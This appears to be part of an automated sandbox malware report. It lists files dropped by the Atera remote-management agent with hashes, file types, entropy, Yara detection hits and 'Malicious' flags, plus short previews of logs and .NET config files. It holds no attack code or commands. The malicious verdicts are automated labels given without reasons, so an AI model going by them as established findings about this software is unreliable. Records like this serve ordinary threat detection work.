                                                                                                                                                                                                                                        SSDEEP:24576:V1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQU:V1n1p9LdRN39aQZUqF
                                                                                                                                                                                                                                        MD5:CA515F4F34826F5ED5A8FB7D3259FEFF
                                                                                                                                                                                                                                        SHA1:D31158793EBB4E0CBE957158F2E42754CA826A29
                                                                                                                                                                                                                                        SHA-256:5042E33133E0422F51382C273153295DF814E5CC2FF2A4FD0D973B4AF54D4933
                                                                                                                                                                                                                                        SHA-512:1336E658AE6097598F3508424085AD288AF4B60D4FDB821A10BAC712492652F7BB06F3E53556CCBB7425A63ED48B53D368481D1F142E6B58FF7C4789737A3CFF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960477572931558
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:hBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU/:hBA/ZTvQD0XY0AJBSjRlXP36RMGK
                                                                                                                                                                                                                                        MD5:EF06D200D340C9798A006F304119BA82
                                                                                                                                                                                                                                        SHA1:C08B838DAC97CD1376D934FB5ECA982BEB19D493
                                                                                                                                                                                                                                        SHA-256:88C838B4EEDFF929AFDABA2BA808775B1979C5C9BD7AAED36525CB1A41D8A8FD
                                                                                                                                                                                                                                        SHA-512:E67597F90A504A1B7C6AE838C8F82BF9928D49B22E896592623E9473147F8C05B974E86567E40D93D9C59602843A532034ACF5BAD2EAD78962AC2435A63E80A7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):293424
                                                                                                                                                                                                                                        Entropy (8bit):6.121578040837099
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:vdmT7N9hXNx16L/kakZieD2C6gVkRYKn6nUa9K+yt:vdc7N/WkQHr64t
                                                                                                                                                                                                                                        MD5:C329213E3BAAC31E55B7E57C9B5692C1
                                                                                                                                                                                                                                        SHA1:C858EFBB991254A929A0D7BCB1087628501E6DC7
                                                                                                                                                                                                                                        SHA-256:38C66E322E92172722E36001F2C9E6151655CFFDA8D78BA730B1878FAD793FF6
                                                                                                                                                                                                                                        SHA-512:C86F49F789B40E4EEC295CB652CFC63FD5C87E51029AF975AFEFA86C57BB6A9E52DAD54993FB7186ECE73BA905EF43C50E11B85F221EBC59698D8E1845FA90BC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):277040
                                                                                                                                                                                                                                        Entropy (8bit):6.190744437011799
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:qSOIleacQlBh2YQMoIBhpq01TLvlj9b6gRZNsRYE:luQlBAMW0BvltxZ6h
                                                                                                                                                                                                                                        MD5:D6F46A4CB8CEB824CD1763B62B8F71A8
                                                                                                                                                                                                                                        SHA1:9FA3A8318D93CBDA86D2843B0783CDF0E7B28D92
                                                                                                                                                                                                                                        SHA-256:66386C99B4BCF568C95E93B11E5E89FC78556924C5BDAC9644BCCA7B04291542
                                                                                                                                                                                                                                        SHA-512:4B720C78E8B3316EAE4FD0BE2499173246AAD3896ED7AF76124A8E565977C27197C73D61474ABA34264F18D5C4BCAF1B51070484CE093814E3CA6C2804AE419F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):284208
                                                                                                                                                                                                                                        Entropy (8bit):6.117480150640407
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:PZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHNS:Rgo0WPVTXgg
                                                                                                                                                                                                                                        MD5:74DD74986D9708CFA8F4B4F0D005B604
                                                                                                                                                                                                                                        SHA1:55C85D2BD0ACD3E14ADF6D442670BC7F3DBBB803
                                                                                                                                                                                                                                        SHA-256:7100B1A666B0AA99EE5036E23ACC1BA3CFF2E7B2C73A2EA72F5359374648349E
                                                                                                                                                                                                                                        SHA-512:6CA3A9F1D10B4C492ED4902631C38F81001BDF256014148A7628166BF1932BBBC9DDA570A295C99F918818EFBA28C82D1E33C1532A2EA8163027C14351CC4ED3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22064
                                                                                                                                                                                                                                        Entropy (8bit):6.679229646565206
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:3y/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqUeaT:3uhMaVmzDC67EpYinAMxCuT
                                                                                                                                                                                                                                        MD5:A4EFAE23A302EE53F0A81FF5B3523292
                                                                                                                                                                                                                                        SHA1:EBB0ADFB9771F4CD61A1D0A9CDFE16CE5621A304
                                                                                                                                                                                                                                        SHA-256:D1D0C53044B2BF85F5B19CAF709BEFFCED51397AE94C37F14EB94E915C6446DE
                                                                                                                                                                                                                                        SHA-512:E77C1CEB40F69342C742AACB07016EA6ED5AFB36949E00E85663EA15996C62E019959FDD44E9E0D468C91DBD89CC8EDE10CCC9F242DB7D6C87D2A6E24E6691FE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):409136
                                                                                                                                                                                                                                        Entropy (8bit):6.098144476210718
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:qPaYZ6henFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUFJFpcNcHc7cbchFFc5cbc1j:06heZBJm333M89QAy
                                                                                                                                                                                                                                        MD5:D03824AAFFA4923C80E6D8B716D8430E
                                                                                                                                                                                                                                        SHA1:06CE0C7BAFB16D3E92B35444467DB7DE0A6C7C84
                                                                                                                                                                                                                                        SHA-256:7782C0F86CE42101799CA9828FABA1798230734D17990637040DCF15F3617644
                                                                                                                                                                                                                                        SHA-512:59A04EFE8423402F57896ED8D70419ADDF52309024606B35E485E051D21076261098DCBE5F7AA7CE5F8BFC93BE992E94A1AE07102F810B9B1E020529C52475E2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51760
                                                                                                                                                                                                                                        Entropy (8bit):6.2347643754291555
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Yzpj9H0/bvvmNAkkOMo/23e3vggrkrD9Bxjpm2yuIFLlHTUpa/hDXEpYinAMxCWZ:YzpjF0/t043e3vggr83jMYa/hU7HxVZ
                                                                                                                                                                                                                                        MD5:520478C4C71D99D43989786250EB4763
                                                                                                                                                                                                                                        SHA1:748AB4CFCCDB28B46E8226115C88681F72C033FE
                                                                                                                                                                                                                                        SHA-256:9708914775950619C1F13B1871CAA6FA7874891985E249F82AC60862C68746A4
                                                                                                                                                                                                                                        SHA-512:1C851D77617A8059491A1F02F81A27F8AE19CCF6EF925F63301F2C20B190BD35CFD60858121F7BA57301684A4685C87F25089040A67D1EB421A4B82AE8403B03
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):138288
                                                                                                                                                                                                                                        Entropy (8bit):6.179821808998386
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:+P3XFz0qjCIIMAxlUXsKovHO420kN1A6C8IlY:+h0qjC5RMOHO420kN1j
                                                                                                                                                                                                                                        MD5:684D6E74002F9691D8CBCB135B6717E2
                                                                                                                                                                                                                                        SHA1:9FC0F5E7AF66ACD2BB0316BF28E9CC0201037EE4
                                                                                                                                                                                                                                        SHA-256:B6AD62636F7224EE73ED95D2E14EB089C34D40BFD2BE21A4C9B02D34CF3FA3E3
                                                                                                                                                                                                                                        SHA-512:76710039C919E70A551E7768C230732F71A069DA34B8BDB7B9D2B853FA9001F3D37952A90E47373F53C8D323E9CAF6726F319FEBA632C2E98F5E06716B1C8EDF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17968
                                                                                                                                                                                                                                        Entropy (8bit):6.673219933457599
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Rh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBAj3IR:Ry9eEpYinAMxCAcW
                                                                                                                                                                                                                                        MD5:ACFCB0A7B3FD1002A8FCD0FD5D65F734
                                                                                                                                                                                                                                        SHA1:8507B9A8EE31430F75678470F5FA06337A76A5E5
                                                                                                                                                                                                                                        SHA-256:98A4333A188E2E88F115C5F8DDADFBED3924900C1071E3226FA5B16E22FFBCB8
                                                                                                                                                                                                                                        SHA-512:29301D054651817479EDD71E80BA4FB2E3CA449A70D7720017DAA3CF6EA2B1390E56EF763C9C9A97D099A0464439923F48D99AB0EFE2FB8B3308BDFBA7708E9A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27184
                                                                                                                                                                                                                                        Entropy (8bit):6.334413974319615
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Sn1VM0JrpNWDcIh6leOiDFIFBYp1+/EpYinAMxCW4:SnvXYcIh6yFIFBYpc47HxN4
                                                                                                                                                                                                                                        MD5:0362AEF9DA024E41795F98D8B888E955
                                                                                                                                                                                                                                        SHA1:53FC9E81D01A7C97D57B9E9ED9A3872EF1E81F74
                                                                                                                                                                                                                                        SHA-256:FC5600A53DD80910B63651E9C5B3B0CA82AA5C53529F4AA0964D21BDC4C64F3A
                                                                                                                                                                                                                                        SHA-512:F65C8EAB66C5C088FB85F16914D18ACB0E2B9B201BD37C5D30B8B0FD2DE2D0AD48C74912C4293ABF611A6A64FD76B3B9B61502993C9EA680723B22A3ED88A612
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.95553243429679
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4019
                                                                                                                                                                                                                                        Entropy (8bit):5.254468395309833
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\log.txt, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:2024-10-02 11:20:38.4434|ERROR|WindowsWindowedEventLogProvider|Error on retry number 1: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2024-10-02 11:20:39.5372|ERROR|WindowsWindowedEventLogProvider|Error on retry number 2: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2024-10-02 11:20:41.5684|ERROR|WindowsWindowedEventLogProvider|Error on retry number 3: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2024-10-02 11:20:44.5997|ERROR|WindowsWindowedEventLogProvider|Error initializing last processed events, ignoring file, exception: System.IO.FileNotFoundException: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...File name: 'C:\Progr
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 12, cookie 0xb, schema 4, UTF-8, version-valid-for 19
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                        Entropy (8bit):0.9364170599017778
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        File Type:SQLite Rollback Journal
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8720
                                                                                                                                                                                                                                        Entropy (8bit):1.8955064555671592
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1799216
                                                                                                                                                                                                                                        Entropy (8bit):6.5204766374461345
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1475632
                                                                                                                                                                                                                                        Entropy (8bit):6.7918990024107115
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2949452
                                                                                                                                                                                                                                        Entropy (8bit):7.998766844143964
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:8Jk0/2eDY5iDZpreSKfF+fHpVIjjjO0jf511ImkTtI4BlZgtfZt3zw358e1jwv4j:eR2SRzrejcfHpajmMf+XjgBZZzQ55jR3
                                                                                                                                                                                                                                        MD5:8AD3A94767AC0F2C39C5881943A17478
                                                                                                                                                                                                                                        SHA1:91614E4C5B7C1B1CC849A867E39CF303341612D9
                                                                                                                                                                                                                                        SHA-256:F9516181C7AF49AD93FCE2259B6736D47E5A642A9EFF5CF01289A8A1E0831073
                                                                                                                                                                                                                                        SHA-512:356D84C1593F57AE9C4367E196BF876BC2F435215379DC9CF0B98F4DE201F168D3E84044FAF225A15D28B02D6CD95A7CE6EA085FD9AC1F0B44EC1D3ECCAB5905
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):29232
                                                                                                                                                                                                                                        Entropy (8bit):6.346564683888365
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:RpYIrVWGYPHEUePsnhkgGIW7W8feKWDpQ6booNyb8E9VF6IYinAM+oC+5Vp4f:fTrVL3Ue0FSTuVboAEpYinAMxCcp4f
                                                                                                                                                                                                                                        MD5:BCC7C0981EBDCFBC51228BAE43844A6F
                                                                                                                                                                                                                                        SHA1:81A1ABEB9CCA5E54407CF362891EDF22D6B40318
                                                                                                                                                                                                                                        SHA-256:35A63B784B0025EF5283F810F8AF93C6E4B12727B2B657AF972DD49E88563AFE
                                                                                                                                                                                                                                        SHA-512:73261987335C6C37F02D027C605E8DE0EA41A14222010B16BBBF73C70DDCD4F01D6EB38D76CF5085D80E45C07164E0273796FC1E7F02575BEDE079C826734917
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2006
                                                                                                                                                                                                                                        Entropy (8bit):5.012466327549389
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:327h+1/gF27RgdSagFsg+w3jdgDSg+CagFPr7:K4Mw9cr7
                                                                                                                                                                                                                                        MD5:DE33D7BC716E96683CCAEC7E3DECC54B
                                                                                                                                                                                                                                        SHA1:6CAC5E2AE17A91F55760F3652DD1D954CFE34848
                                                                                                                                                                                                                                        SHA-256:E9EC2DB29E1A7F44D6FAD976E29627E2EBCC1C9FD1797D56A69106260B70B65D
                                                                                                                                                                                                                                        SHA-512:353BF5BC4E47C7218CD3EECEE83301950FAA7D48644BEA3FE2F47B5AB432D43B466EBCF8E1A1911923EC423D30682A8FA42A3EA878E7D85C8E91EC841543B887
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):200240
                                                                                                                                                                                                                                        Entropy (8bit):5.751213785689997
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:zq1M5Ozcq7TAy5P+mIowb/m8Fh8bZyfT2tl2gJrPdniqiTjyrRuQf:OOOzxTLwb6bZL2kLFiqiTj0R5
                                                                                                                                                                                                                                        MD5:949A8A47B11A9950C27FE6F5FFC3A864
                                                                                                                                                                                                                                        SHA1:B1160033C950E88BA4A172E80746E34F78306F05
                                                                                                                                                                                                                                        SHA-256:940A8586DA9CFC9E0980BC541B275C9EF14657EB35BB1F6EA16ACDF5784116B2
                                                                                                                                                                                                                                        SHA-512:AB8FD5F7A7DF4F6E95D69766A808E10BA3297BA36CC199FA0B67DBB9D656B516C0FC7739DBDBB8E1D6D362BF9E585C8D159C8955CA21EE3649C5E9FC45364C2B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1780
                                                                                                                                                                                                                                        Entropy (8bit):5.027025756159462
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:3rrL7h+1/gFSagFsg+w327RgdSg+CjdgDt:7r34owoR
                                                                                                                                                                                                                                        MD5:09CDFC3063DEC485A3C48111D5CEE297
                                                                                                                                                                                                                                        SHA1:02CEFEC66B6B2EEE120F97493D438F3B270AB5CA
                                                                                                                                                                                                                                        SHA-256:0ACF70AE533AF7D079F370AB3102B9563CA4C447C5DFC7A20C88AABE04295C01
                                                                                                                                                                                                                                        SHA-512:CA39056F79EFC8CE050FCCE1AAC21B2E7B62E65A0521E3CABF90C58A7249107658C2D208706FEC456CCC74D58DCDC22E23ECBAA43684613D4826505A426E1CB7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <depend
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.418295834054489
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhU3n:Wg
                                                                                                                                                                                                                                        MD5:217EFB4CFD0E2FE659EB9238EA4C3121
                                                                                                                                                                                                                                        SHA1:956FF139442FAF8CBEA2940171559AF5BEE3B6E5
                                                                                                                                                                                                                                        SHA-256:05FD94189E503EFA8D3BD8CFC139A50FA2D4B6BFF702D1345D165E85CD09867D
                                                                                                                                                                                                                                        SHA-512:DCE527723D814EF4F435875E15028FCB7DE73AB73E9519F2D87AAEE3AF10BB6854C62BCCDF4786712F3746971B2CBB4C789C9FF7D9AB200B9DD2BA4734059E1A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=19.9
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):102448
                                                                                                                                                                                                                                        Entropy (8bit):6.190799321034417
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:APAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OL87HxO+:A2bYbYSWd85I5sSakFQhHL8V
                                                                                                                                                                                                                                        MD5:2707BB836BFC65D4376E2B8BCF0D63EC
                                                                                                                                                                                                                                        SHA1:E98AAD3AB9E526A0333451812B72EF283527FE87
                                                                                                                                                                                                                                        SHA-256:06E196BAD76BD3D049EED239FFF7A52F2997220644787827B1D86BCC07F7BAF8
                                                                                                                                                                                                                                        SHA-512:831C75370D31E9543D29F20094122A770C10474931AC8D01F77F9279FB05869691E554B68F8C92FA3F98F03F8BCB70ECBF6A9FCD18E87EE783A6DC7B8AD084FD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95280
                                                                                                                                                                                                                                        Entropy (8bit):5.9971941696500854
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:84aRSNSrXS5EaKoDMsUVl0HAWMco2bJkj87HxsJ:84auS7S5Ea6WMcpu8c
                                                                                                                                                                                                                                        MD5:BE93D1C9AC8E66DDA6E5BED7055954EE
                                                                                                                                                                                                                                        SHA1:AFCC7792DA094C4E8FCA8F5021699EE12DF6A5FD
                                                                                                                                                                                                                                        SHA-256:665A41FAE1ED70797AC596FCD9EE2A3FF637EE2C64ECEE71853AC9CC03FBE472
                                                                                                                                                                                                                                        SHA-512:2EFB2AAAD0ABD71D0B9B1426EA5597625E9E19BC26DE4E61866234B49420B028ACD7B59C31924027C7DFF8D61741BF8980F5CD8992FBDA389704AEB83F580612
                                                                                                                                                                                                                                        Malicious:true
